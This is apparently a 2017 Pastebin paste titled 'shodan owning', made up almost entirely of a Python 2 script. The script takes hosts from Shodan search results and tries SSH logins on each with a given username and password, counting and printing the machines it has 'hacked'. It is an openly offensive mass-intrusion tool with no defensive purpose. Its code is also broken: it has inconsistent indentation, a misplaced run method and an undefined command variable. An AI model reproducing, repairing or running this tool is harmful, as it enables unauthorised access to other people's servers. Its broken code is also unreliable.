PH1K3

shodan owning

Feb 17th, 2017
2,691
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #own_all.py
  3. #script to scan shodan for stuff and brute force ssh by PH1K3
  4. import threading
  5. import sys, shodan
  6. import pexpect, pxssh, time
  7.  
  8.  
  9. searchfor = sys.argv[1]
  10. page = sys.argv[2]#search x amount of pages
  11. password = sys.argv[3]
  12. user = sys.argv[4]
  13.  
  14. api = shodan.Shodan('')#API KEY GOES HERE
  15. results = api.search(searchfor)
  16.  
  17. class ClientThread ( threading.Thread ):
  18.     def __init__ ( self, ip ):
  19.         self.ip = ip
  20.         threading.Thread.__init__ ( self )
  21.  
  22.         def run( self ):
  23.             try:
  24.                 s = pxssh.pxssh()
  25.                 s.login (ip, user, password, login_timeout=2)
  26.                 s.sendline (command)
  27.                 s.prompt()
  28.                 #print "\n",s.before
  29.                 s.logout()
  30.                
  31.  
  32.                         login = True
  33.                 print 'hacked'
  34.                
  35.             except Exception, e:
  36.                 login = False
  37.                 print "[-] Failed"
  38.                 pass
  39.  
  40.             return login
  41.  
  42.  
  43.  
  44.  
  45. count = 1
  46. owned = 0
  47. while (count < page):
  48.     results = api.search(searchfor, page=count)
  49.         for result in results['matches']:
  50.         ip = str(result['ip_str'])
  51.         #if bruteforce(ip):
  52.         if ClientThread ( ip ).start():
  53.             owned = owned + 1
  54.             print 'hacked: ' + str(owned)
  55.         else:
  56.             pass
  57.         count = count + 1
  58.         print 'count: ' + str(count)
  59.         pass
  60.     print 'done, i have hacked ' + str(owned)
RAW Paste Data